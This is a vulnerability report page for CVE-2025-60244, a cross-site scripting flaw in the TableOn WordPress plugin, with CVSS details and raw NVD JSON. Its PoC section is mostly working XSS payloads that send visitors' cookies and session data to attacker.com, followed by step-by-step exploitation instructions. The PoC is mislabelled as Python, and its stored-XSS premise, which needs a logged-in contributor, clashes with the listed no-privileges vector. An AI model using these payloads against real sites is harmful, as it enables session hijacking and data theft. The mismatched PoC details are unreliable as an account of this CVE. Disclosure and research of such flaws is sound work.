Security Vulnerability Report
中文
CVE-2025-60244 CVSS 7.1 HIGH

CVE-2025-60244

Published: 2025-11-06 16:16:07
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in RealMag777 TableOn posts-table-filterable allows Code Injection.This issue affects TableOn: from n/a through <= 1.0.5.1.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

TableOn <= 1.0.5.1
TableOn < 1.0.6 (修复版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-60244 PoC: Stored XSS in TableOn WordPress Plugin --> <!-- This PoC demonstrates the storage XSS vulnerability in TableOn plugin <= 1.0.5.1 --> <!-- Attack vector: Inject malicious JavaScript through WordPress post content --> <!-- Method 1: Script tag injection --> <script>console.log('XSS Payload Executed'); // Steal cookies document.location='https://attacker.com/steal?cookie='+document.cookie; </script> <!-- Method 2: Event handler injection (alternative) --> <img src=x onerror="fetch('https://attacker.com/log?data='+document.cookie)"> <!-- Method 3: SVG-based injection --> <svg/onload=fetch('https://attacker.com/steal?sess='+btoa(document.cookie))> <!-- Steps to exploit: --> <!-- 1. Login to WordPress with contributor/author/admin privileges --> <!-- 2. Create or edit a post --> <!-- 3. Add one of the above payloads in a field displayed by TableOn --> <!-- 4. Save and publish the post --> <!-- 5. When any user views the post or TableOn table, the JS executes --> <!-- Real-world attack payload example: --> <script> // Exfiltrate session data const data = { cookies: document.cookie, url: window.location.href, userAgent: navigator.userAgent, referrer: document.referrer }; // Send stolen data to attacker-controlled server fetch('https://attacker.com/api/collect', { method: 'POST', mode: 'no-cors', body: JSON.stringify(data) }); </script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60244", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:07.217", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in RealMag777 TableOn posts-table-filterable allows Code Injection.This issue affects TableOn: from n/a through <= 1.0.5.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/posts-table-filterable/vulnerability/wordpress-tableon-plugin-1-0-4-2-content-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}